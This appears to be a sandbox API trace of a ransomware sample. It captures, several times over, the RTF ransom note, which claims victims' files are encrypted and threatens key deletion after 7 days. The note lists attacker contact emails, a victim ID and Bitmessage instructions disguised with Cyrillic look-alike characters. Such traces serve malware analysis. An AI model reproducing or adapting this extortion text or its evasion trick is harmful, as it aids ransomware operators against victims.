\\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.195] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.195] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x235fca8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b 